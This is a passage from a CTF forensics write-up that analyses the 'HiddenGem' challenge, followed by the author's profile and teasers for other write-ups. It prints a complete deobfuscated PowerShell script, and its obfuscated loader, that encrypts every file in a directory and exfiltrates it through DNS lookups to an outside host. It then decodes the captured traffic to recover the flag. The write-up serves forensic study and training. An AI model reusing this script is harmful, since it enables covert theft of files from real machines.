${)}${![/}${~=} +${)}${~}${@[}+${)}${~=}${@[}${~} +${)}${~}${@[} +${)}${~}${]} + ${)}${@$/}${@$/} + ${)}${]}${~=} + ${)}${~}${]} +${)}${@$/}${'$[} + ${)}${$] }${@$/}+${)}${~}${@[} +${)}${~=}${;+}${$] } + ${)}${~=}${;+}${@[} +${)}${~}${@[}+${)}${![/}${;+} +${)}${![/}${;+} + ${)}${~}${]}+ ${)}${~=}${~=}${;+}+ ${)}${![/}${@[} + ${)}${~}${]} +${)}${@$/}${'$[}+${)}${![/}${~=} +${)}${![/}${~}+${)}${~}${]} + ${)}${@$/}${@$/} +${)}${~}${@[} +${)}${![/}${$] } +${)}${~=}${;+}${~}+${)}${~=}${~=}${]} + ${)}${~}${@[}+ ${)}${~}${]}+${)}${~=}${;+}${'$[} +${)}${![/}${~=}+${)}${~}${@[} + ${)}${~=}${@[}${~}+${)}${~}${@[}+ ${)}${~}${]} + ${)}${@$/}${@$/}+${)}${]}${~=} + ${)}${~}${]} + ${)}${~=}${;+}${'$[} +${)}${![/}${$] } +${)}${![/}${;+}+ ${)}${~}${]}+ ${)}${~=}${~=}${;+}+ ${)}${![/}${@[}+${)}${~}${]} + ${)}${@$/}${'$[} + ${)}${![/}${~=}+${)}${~}${@[}+${)}${~=}${@[}${$] } + ${)}${$] }${@$/} +${)}${~}${@[} +${)}${~}${]}+ ${)}${~=}${~=}${![/} +${)}${![/}${~}+${)}${]}${~=}+ ${)}${~}${]}+ ${)}${~=}${;+}${~=} + ${)}${![/}${]} +${)}${'$[}${~}+${)}${~=}${~=}${](} + ${)}${@$/}${'$[} + ${)}${~=}${~=}${$] }+${)}${~=}${~=}${]} + ${)}${~=}${~=}${![/} +${)}${~=}${;+}${$] }+${)}${~=}${~=}${;+}+ ${)}${~=}${;+}${~} +${)}${![/}${;+}+${)}${~}${]} +${)}${~=}${~=}${;+}+${)}${![/}${@[}+ ${)}${~}${]} +${)}${@$/}${'$[} + ${)}${![/}${![/}+ ${)}${~}${@[}+ ${)}${~}${]}+ ${)}${@$/}${@$/} +${)}${![/}${~=} +${)}${~}${@[}+${)}${![/}${~}+${)}${~}${@[} + ${)}${~}${![/}+ ${)}${![/}${]} + ${)}${~}${![/}+${)}${$] }${@$/}+ ${)}${~}${@[}+${)}${~=}${;+}${$] }+${)}${~=}${;+}${@[} +${)}${~}${@[}+${)}${![/}${;+}+ ${)}${![/}${;+} + ${)}${~}${]}+ ${)}${~=}${~=}${;+} + ${)}${~}${](}+ ${)}${~}${]} + ${)}${~=}${~=}${$] } + ${)}${![/}${~=} + ${)}${~}${@[}+ ${)}${![/}${$] } + ${)}${~=}${;+}${~=} + ${)}${~=}${~=}${~} +${)}${~}${@[}+${)}${![/}${;+}+${)}${~}${]}+ ${)}${~=}${~=}${$] }+${)}${![/}${$] } +${)}${![/}${@$/}+ ${)}${![/}${~=} + ${)}${![/}${~=}+${)}${~}${@[} + ${)}${~=}${@[}${~}+ ${)}${~}${@[}+${)}${~=}${~=}${;+}+${)}${~=}${~=}${$] }+ ${)}${~=}${;+}${'$[} + ${)}${~=}${~=}${~=} +${)}${~=}${~=}${~=}+${)}${~=}${;+}${](}+${)}${~=}${~=}${](} +${)}${~=}${~=}${@[}+${)}${~}${@[} +${)}${![/}${$] }+ ${)}${~=}${~=}${]}+ ${)}${~=}${@[}${~=}+ ${)}${~=}${~=}${@[} + ${)}${~=}${;+}${~=}+ ${)}${]}${~=}+${)}${]}${$] } + ${)}${~}${@[} + ${)}${~}${]}+${)}${~=}${~=}${![/} +${)}${~}${]} +${)}${@$/}${](} + ${)}${![/}${]}+ ${)}${~}${@[} + ${)}${~}${]}+${)}${~=}${;+}${;+} + ${)}${$] }${@$/} +${)}${~}${@[}+ ${)}${~}${]} +${)}${~=}${~=}${![/}+ ${)}${]}${~=}+${)}${~}${![/} +${)}${~}${![/} +${)}${~}${@[}+ ${)}${~=}${@[}${$] }+${)}${~}${@[} +${)}${~}${]} +${)}${~=}${~=}${;+} +${)}${]}${~=}+ ${)}${~}${]}+${)}${~=}${~=}${;+} +${)}${![/}${~} + ${)}${![/}${@$/}+${)}${~}${@[}+${)}${~=}${@[}${$] } + ${)}${~}${@[} + ${)}${~=}${~=}${;+}+${)}${~=}${~=}${$] } + ${)}${~=}${;+}${'$[} + ${)}${~=}${~=}${~=}+${)}${~=}${~=}${~=}+${)}${~=}${;+}${](} + ${)}${~=}${~=}${](}+ ${)}${~=}${~=}${@[} +${)}${~}${@[}+ ${)}${![/}${$] }+${)}${~=}${~=}${]} + ${)}${~=}${@[}${~=}+ ${)}${~=}${~=}${@[}+ ${)}${~=}${;+}${~=} + ${)}${]}${~=}+ ${)}${]}${$] }+${)}${~}${@[}+ ${)}${~}${]} + ${)}${~=}${~=}${![/}+ ${)}${~}${]} +${)}${@$/}${](} +${)}${![/}${]} + ${)}${~}${@[} + ${)}${~}${]} +${)}${~=}${;+}${;+} +${)}${~}${@[}+ ${)}${~=}${@[}${$] } | ${;@!} " |& ${;@!} ``` Then decrypt it to get: ``` [CHar]36+[CHar]100+[CHar]61 +[CHar]34 +[CHar]49 +[CHar]55+ [CHar]50 +[CHar]46+[CHar]50+ [CHar]49 +[CHar]46+[CHar]50 + [CHar]48+[CHar]46+[CHar]57+[CHar]54 +[CHar]34 +[CHar]59 +[CHar]32+ [CHar]36+[CHar]115 + [CHar]61+ [CHar]52 + [CHar]59+ [CHar]32 + [CHar]36+[CHar]98 +[CHar]61+ [CHar]53 + [CHar]55 + [CHar]59 +[CHar]32 +[CHar]71+ [CHar]101+ [CHar]116 +[CHar]45 +[CHar]67+ [CHar]104+[CHar]105+ [CHar]108 +[CHar]100 +[CHar]73 + [CHar]116+[CHar]101+[CHar]109+ [CHar]32 + [CHar]34 +[CHar]46 +[CHar]34+ [CHar]32+ [CHar]124+ [CHar]32 +[CHar]70+ [CHar]111+[CHar]114+[CHar]101 +[CHar]97+[CHar]99+[CHar]104+[CHar]45+ [CHar]79+[CHar]98 +[CHar]106+ [CHar]101 +[CHar]99 + [CHar]116+ [CHar]32 +[CHar]123 + [CHar]36 + [CHar]97+[CHar]61+ [CHar]91 + [CHar]83 + [CHar]121+[CHar]115 + [CHar]116+[CHar]101+ [CHar]109 + [CHar]46+[CHar]67+ [CHar]111+ [CHar]110+ [CHar]118+ [CHar]101+ [CHar]114+[CHar]116 +[CHar]93 +[CHar]58+ [CHar]58+ [CHar]84+[CHar]111+ [CHar]66+[CHar]97 +[CHar]115+ [CHar]101+[CHar]54 + [CHar]52+[CHar]83 +[CHar]116 + [CHar]114+ [CHar]105+[CHar]110+ [CHar]103+ [CHar]40+ [CHar]36+[CHar]69 +[CHar]110+ [CHar]99 + [CHar]46+[CHar]71 +[CHar]101 + [CHar]116 + [CHar]66+ [CHar]121+[CHar]116+[CHar]101 +[CHar]115+[CHar]40 +[CHar]36 + [CHar]95 + [CHar]46+ [CHar]78+ [CHar]97 +[CHar]109 +[CHar]101+[CHar]41+ [CHar]41 +[CHar]59+ [CHar]32 +[CHar]36+[CHar]82+[CHar]61 + [CHar]123+[CHar]36 +[CHar]68 + [CHar]44 +[CHar]36 + [CHar]75 +[CHar]61 +[CHar]36+[CHar]65+[CHar]114 + [CHar]103 +[CHar]115+[CHar]59 +[CHar]36+ [CHar]83+[CHar]61+ [CHar]48+[CHar]46+ [CHar]46 + [CHar]50 + [CHar]53 +[CHar]53 +[CHar]59 + [CHar]48 +[CHar]46+[CHar]46 + [CHar]50+ [CHar]53+ [CHar]53 +[CHar]124 +[CHar]37+[CHar]123 +[CHar]36 + [CHar]74 +[CHar]61 +[CHar]40+[CHar]36+[CHar]74+[CHar]43 + [CHar]36 + [CHar]83+ [CHar]91+ [CHar]36+[CHar]95+[CHar]93+ [CHar]43 + [CHar]36 + [CHar]75 +[CHar]91 +[CHar]36 +[CHar]95+ [CHar]37 +[CHar]36 + [CHar]75 + [CHar]46+[CHar]76 +[CHar]101+[CHar]110 + [CHar]103+ [CHar]116 +[CHar]104 +[CHar]93+[CHar]41+ [CHar]37+[CHar]50+[CHar]53+[CHar]54 + [CHar]59 + [CHar]36+[CHar]83+ [CHar]91+ [CHar]36 + [CHar]95 +[CHar]93 + [CHar]44 + [CHar]36 +[CHar]83+[CHar]91 +[CHar]36+ [CHar]74+ [CHar]93 +[CHar]61+[CHar]36+ [CHar]83+[CHar]91+[CHar]36 + [CHar]74 +[CHar]93+ [CHar]44 + [CHar]36 + [CHar]83 +[CHar]91 +[CHar]36 +[CHar]95 + [CHar]93 +[CHar]125+[CHar]59 + [CHar]36+ [CHar]68+ [CHar]124+[CHar]37 + [CHar]123 +[CHar]36 +[CHar]73+[CHar]61 +[CHar]40+ [CHar]36+ [CHar]73 + [CHar]43+ [CHar]49+ [CHar]41 + [CHar]37 +[CHar]50 +[CHar]53+[CHar]54+ [CHar]59+ [CHar]36+ [CHar]72 +[CHar]61+[CHar]40+ [CHar]36 +[CHar]72+ [CHar]43 +[CHar]36+[CHar]83+ [CHar]91 + [CHar]36+[CHar]73+[CHar]93+[CHar]41 + [CHar]37 +[CHar]50+ [CHar]53 + [CHar]54 +[CHar]59+[CHar]36 +[CHar]83+[CHar]91+ [CHar]36 +[CHar]73+[CHar]93+[CHar]44+ [CHar]36+ [CHar]83+ [CHar]91+ [CHar]36+ [CHar]72 +[CHar]93 + [CHar]61 +[CHar]36+[CHar]83+ [CHar]91 + [CHar]36+[CHar]72+[CHar]93+ [CHar]44 + [CHar]36+ [CHar]83 +[CHar]91+ [CHar]36 + [CHar]73+[CHar]93 + [CHar]59 + [CHar]36 + [CHar]95 +[CHar]45+ [CHar]98+[CHar]120+ [CHar]111 + [CHar]114+ [CHar]36+ [CHar]83+[CHar]91+ [CHar]40+ [CHar]36+[CHar]83+[CHar]91+ [CHar]36+ [CHar]73 +[CHar]93 +[CHar]43 + [CHar]36+ [CHar]83 +[CHar]91+[CHar]36 +[CHar]72+[CHar]93 + [CHar]41+ [CHar]37 + [CHar]50+ [CHar]53 + [CHar]54 +[CHar]93+ [CHar]125+ [CHar]125+ [CHar]59+ [CHar]32 +[CHar]36 + [CHar]69 +[CHar]110 + [CHar]99+ [CHar]32 + [CHar]61 +[CHar]32 + [CHar]91+[CHar]83 +[CHar]121 + [CHar]115+ [CHar]116 + [CHar]101 +[CHar]109+ [CHar]46+[CHar]84+[CHar]101+[CHar]120 + [CHar]116 +[CHar]46 + [CHar]69 + [CHar]110 + [CHar]99+[CHar]111 +[CHar]100 + [CHar]105+ [CHar]110 +[CHar]103+ [CHar]93+[CHar]58+[CHar]58+ [CHar]65 + [CHar]83+ [CHar]67+[CHar]73+ [CHar]73 + [CHar]59 +[CHar]32+[CHar]36 +[CHar]112+[CHar]32+ [CHar]61 +[CHar]32+ [CHar]36+ [CHar]69+ [CHar]110+ [CHar]99+ [CHar]46 +[CHar]71 +[CHar]101 +[CHar]116 +[CHar]66+ [CHar]121+[CHar]116+[CHar]101 + [CHar]115+[CHar]40 +[CHar]39+[CHar]91+ [CHar]83 + [CHar]121 +[CHar]115 + [CHar]116 + [CHar]101 +[CHar]109+ [CHar]46 + [CHar]73+[CHar]79+ [CHar]46+ [CHar]70+[CHar]105+ [CHar]108+ [CHar]101 +[CHar]93 + [CHar]58+ [CHar]58+ [CHar]82+ [CHar]101 + [CHar]97 +[CHar]100+ [CHar]65+ [CHar]108 + [CHar]108+[CHar]66 +[CHar]121+[CHar]116 + [CHar]101 + [CHar]115 + [CHar]40 + [CHar]36 +[CHar]95+[CHar]46 +[CHar]70+[CHar]117+[CHar]108+[CHar]108+[CHar]78 + [CHar]97 + [CHar]109 + [CHar]101+ [CHar]41 +[CHar]39 + [CHar]41 + [CHar]59+[CHar]32 + [CHar]36 +[CHar]122 +[CHar]32+ [CHar]61 +[CHar]32 + [CHar]36+ [CHar]69+ [CHar]110+ [CHar]99 +[CHar]46 +[CHar]71 +[CHar]101 + [CHar]116 +[CHar]66 + [CHar]121 +[CHar]116+ [CHar]101 +[CHar]115 +[CHar]40+[CHar]91+ [CHar]83 + [CHar]121+ [CHar]115+ [CHar]116 +[CHar]101+[CHar]109+ [CHar]46 + [CHar]73+[CHar]79+ [CHar]46 +[CHar]70 +[CHar]105 + [CHar]108+[CHar]101 + [CHar]93+ [CHar]58+[CHar]58 +[CHar]82 + [CHar]101 +[CHar]97+ [CHar]100 +[CHar]65 +[CHar]108 + [CHar]108 +[CHar]66+[CHar]121+ [CHar]116 +[CHar]101 +[CHar]115+ [CHar]40+[CHar]36 + [CHar]95 + [CHar]46 + [CHar]70 +[CHar]117 +[CHar]108+ [CHar]108 + [CHar]78+[CHar]97+[CHar]109 + [CHar]101 +[CHar]41+[CHar]41 + [CHar]59 +[CHar]32 +[CHar]36 +[CHar]117 +[CHar]32+[CHar]61 +[CHar]32 + [CHar]40+ [CHar]38 + [CHar]32+[CHar]36+[CHar]82+[CHar]32 +[CHar]36 +[CHar]122 +[CHar]32+ [CHar]36+[CHar]112 + [CHar]41+ [CHar]59+[CHar]32+ [CHar]36+[CHar]101 + [CHar]32 +[CHar]61+[CHar]32+[CHar]91+ [CHar]83 +[CHar]121 + [CHar]115+[CHar]116+ [CHar]101+[CHar]109 +[CHar]46 +[CHar]67 +[CHar]111 +[CHar]110+[CHar]118 + [CHar]101+[CHar]114 + [CHar]116 + [CHar]93+[CHar]58 +[CHar]58+ [CHar]84 + [CHar]111+ [CHar]66+[CHar]97 + [CHar]115 +[CHar]101 +[CHar]54+[CHar]52 +[CHar]83+ [CHar]116 +[CHar]114 +[CHar]105 +[CHar]110 + [CHar]103+ [CHar]40 + [CHar]36+[CHar]117 + [CHar]41 +[CHar]59 + [CHar]32 + [CHar]36+ [CHar]108 + [CHar]61+ [CHar]36+ [CHar]101+ [CHar]46+ [CHar]76 +[CHar]101+[CHar]110+[CHar]103+ [CHar]116+[CHar]104 + [CHar]59 + [CHar]32+[CHar]36+ [CHar]114 +[CHar]61+ [CHar]34 +[CHar]34 +[CHar]59 + [CHar]32 +[CHar]36+ [CHar]110+[CHar]61+ [CHar]48 + [CHar]59 + [CHar]32 + [CHar]119+[CHar]104+[CHar]105+ [CHar]108 + [CHar]101+[CHar]32 +[CHar]40 + [CHar]36+[CHar]110+ [CHar]32 + [CHar]45+[CHar]108 +[CHar]101 + [CHar]32+[CHar]40+ [CHar]36 + [CHar]108+[CHar]47 +[CHar]36 + [CHar]98+[CHar]41 + [CHar]41 +[CHar]32+[CHar]123 +[CHar]32 +[CHar]36 + [CHar]99 + [CHar]61 + [CHar]36 +[CHar]98 + [CHar]59+[CHar]32 +[CHar]105 + [CHar]102 +[CHar]32+[CHar]40 +[CHar]40 + [CHar]36+ [CHar]110+ [CHar]42 + [CHar]36 +[CHar]98+[CHar]41 +[CHar]43+[CHar]36 + [CHar]99 +[CHar]32 +[CHar]45 +[CHar]103+[CHar]116 + [CHar]32+ [CHar]36+[CHar]108 +[CHar]41+[CHar]32 + [CHar]123+[CHar]32+ [CHar]36 + [CHar]99+[CHar]61 + [CHar]36 + [CHar]108 +[CHar]45 +[CHar]40+ [CHar]36+ [CHar]110+ [CHar]42+[CHar]36 + [CHar]98 + [CHar]41+[CHar]32+[CHar]125 + [CHar]59 +[CHar]32 +[CHar]36+ [CHar]114 +[CHar]43+[CHar]61+ [CHar]36+ [CHar]101 + [CHar]46 +[CHar]83+[CHar]117 + [CHar]98 + [CHar]115+[CHar]116 + [CHar]114 +[CHar]105+[CHar]110+ [CHar]103 +[CHar]40+[CHar]36 +[CHar]110+[CHar]42+ [CHar]36 +[CHar]98 + [CHar]44+ [CHar]32+ [CHar]36+ [CHar]99 +[CHar]41 +[CHar]32+[CHar]43+[CHar]32 + [CHar]34+ [CHar]46 + [CHar]34+[CHar]59+ [CHar]32+[CHar]105+[CHar]102 +[CHar]32+[CHar]40+ [CHar]40 + [CHar]36+ [CHar]110 + [CHar]37+ [CHar]36 + [CHar]115 + [CHar]41 + [CHar]32+ [CHar]45 + [CHar]101 + [CHar]113 +[CHar]32+[CHar]40+[CHar]36+ [CHar]115+[CHar]45 +[CHar]49+ [CHar]41 + [CHar]41+[CHar]32 + [CHar]123+ [CHar]32+[CHar]110+[CHar]115+ [CHar]108 + [CHar]111 +[CHar]111+[CHar]107+[CHar]117 +[CHar]112+[CHar]32 +[CHar]45+ [CHar]116+ [CHar]121+ [CHar]112 + [CHar]101+ [CHar]61+[CHar]65 + [CHar]32 + [CHar]36+[CHar]114 +[CHar]36 +[CHar]97 + [CHar]46+ [CHar]32 + [CHar]36+[CHar]100 + [CHar]59 +[CHar]32+ [CHar]36 +[CHar]114+ [CHar]61+[CHar]34 +[CHar]34 +[CHar]32+ [CHar]125+[CHar]32 +[CHar]36 +[CHar]110 +[CHar]61+ [CHar]36+[CHar]110 +[CHar]43 + [CHar]49+[CHar]32+[CHar]125 + [CHar]32 + [CHar]110+[CHar]115 + [CHar]108 + [CHar]111+[CHar]111+[CHar]107 + [CHar]117+ [CHar]112 +[CHar]32+ [CHar]45+[CHar]116 + [CHar]121+ [CHar]112+ [CHar]101 + [CHar]61+ [CHar]65+[CHar]32+ [CHar]36 + [CHar]114+ [CHar]36 +[CHar]97 +[CHar]46 + [CHar]32 + [CHar]36 +[CHar]100 +[CHar]32+ [CHar]125 | iex ``` Finally, when decrypting and formatting, you can get ``` $d="172.21.20.96"; $s=4; $b=57; Get-ChildItem "." | Foreach-Object { $a=[System.Convert]::ToBase64String($Enc.GetBytes($_.Name)); $R={ $D,$K=$Args; $S=0..255;0..255|%{ $J=($J+$S[$_]+$K[$_%$K.Length])%256; $S[$_],$S[$J]=$S[$J],$S[$_] }; $D|%{ $I=($I+1)%256; $H=($H+$S[$I])%256; $S[$I],$S[$H]=$S[$H],$S[$I]; $_-bxor$S[($S[$I]+$S[$H])%256] } }; $Enc = [System.Text.Encoding]::ASCII; $p = $Enc.GetBytes('[System.IO.File]::ReadAllBytes($_.FullName)'); $z = $Enc.GetBytes([System.IO.File]::ReadAllBytes($_.FullName)); $u = (& $R $z $p); $e = [System.Convert]::ToBase64String($u); $l=$e.Length; $r=""; $n=0; while ($n -le ($l/$b)) { $c=$b; if (($n*$b)+$c -gt $l) { $c=$l-($n*$b) }; $r+=$e.Substring($n*$b, $c) + "."; if (($n%$s) -eq ($s-1)) { nslookup -type=A $r$a. $d; $r="" } $n=$n+1 } nslookup -type=A $r$a. $d } ``` It can be observed that his essence is base64+rc4+ splitting Made a cyberchef decryption: https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true,false)RC4(%7B'option': 'UTF8','string':'%5BSystem.IO.File%5D::ReadAllBytes($_.FullName)'%7D,'Latin1','Latin1')From_Decimal('Space',false) ### Decrypt DNS packets: ![](https://i.imgur.com/bwvUSKI.png) `tshark -r HiddenGem.pcapng -T fields -e dns.resp.name | sed '/^\s*$/d' > 1.txt` First extract all of them into 1.txt. It can be seen that the form of dns traffic is to encrypt the data above and then separate every 57 characters with ".", with three paragraphs per line and add the base64 of the file name at the end encoding, so with a simple extraction, all the filenames are known ``` des.txt KCSC.jpg SecretPlan.pdf update.ps1 zoneblue.jpg ``` The most suspicious one is SecretPlan.pdf, so you can manually extract it and remove the data other than the file data, and then decrypt it in the cyberchef link above. ![](https://i.imgur.com/rSDM5Hg.png) To get the url https://pastebin.com/xCmXLGUq, access to get the flag --> `idek{RDP_Cache_1s_g0OD_bu7_1_h4t3_t4K1n9_t3x7_fr0M_Im4g3s}`
Last changed by  
crazyman
r3kapig摸鱼划水人 平常喜欢做做misc以及取证类题目 现在在学习逆向和pwn 密码等方向 比较菜 呜呜呜呜
3103

Read more

西湖论剑-Isolated Machine Memory Analysis Writeup

本文赛后与zysgmzb共同完成 Isolated Machine Memory Analysis: 题目名称: Isolated Machine Memory Analysis 题目内容: 张三,现用名叫Charlie,在一家外企工作,负责flag加密技术的研究。为了避免flag泄露,这家企业制定了严格的安全策略,严禁flag离开研发服务器,登录服务器必须经过跳板机。张三使用的跳板机是一台虚拟机,虽然被全盘加密没法提取,但好消息是至少还没关机。 免责声明:本题涉及的人名、单位名、产品名、域名及IP地址等均为虚构,如有雷同纯属巧合。 注:本题模拟真实研发环境,解题有关的信息不会出现在人名、域名或IP地址等不合常理的地方。链接:https://pan.baidu.com/s/1WESej-pyjWKZni7drZGTig?pwd=cq46 提取码:cq46 题目难度:

3/1/2023
Insomni'hack teaser 2023 - Autopsy:

In the Lunar New Year, I played Insomni'hack teaser 2023, one of the topics labeled forensics, realistic, windows aroused my interest, I solved him. And I learned some knowledge from it. This is the record writeup Autopsy: Wireshark loads through the export object and selects http, save all and then filters to get three files SYSTEM, SECURITY, ntds.dit Then after searching, you can learn some relevant content about credential extraction https://github.com/SecureAuthCorp/impacket Through some things made by secretdump.py, it seems that it is not very useful. But it may be used to extract the key to decrypt the traffic

1/23/2023
idek 2022* CTF Pyjail && Pyjail Revenge Writeup

Pyjail: The code looks like this blocklist = ['.', '\\', '[', ']', '{', '}',':'] DISABLE_FUNCTIONS = ["getattr", "eval", "exec", "breakpoint", "lambda", "help"] DISABLE_FUNCTIONS = {func: None for func in DISABLE_FUNCTIONS} There is a blocklist ban off '.' , '\\', '[', ']', '{', '}', ':'. Then there is a DISABLE_FUNCTIONS that registers None objects for 'getattr', 'eval', 'exec', 'breakpoint', 'lambda', 'help' and overrides the corresponding functions in __builtins__. Also, the file name is jail.py, and the one in docker is also jail, so you can use __import__('jail'), but you may have to type it twice, so it's better to use __import__(__main__). Also flag sets permission not to read directly and then gives a readflag, called with the argument /readflag giveflag Also, this question can be executed in multiple lines, so you can do something like emptying the blocklist as follows

1/18/2023
2022年总结,2023的展望

看朋友圈以及推上面不少人写了自己关于2022年的总结. 简单概括一下我今年都做了啥: CVE-2022-30190(我人生第一个CVE) 建立了一些知识库,用于收集平时打的比赛的一些题目 第一次和一些小伙伴一起当赛事主办方 办了一个HNCTF新生赛 似乎玩得人蛮多的 自己运维的Shadow Chaser Group(@ShadowChasing1) 的follow突破8k 自己运维了一个r3kapig Team的免费知识星球 并且用于知识推送

12/31/2022
Read more from crazyman
Published on HackMD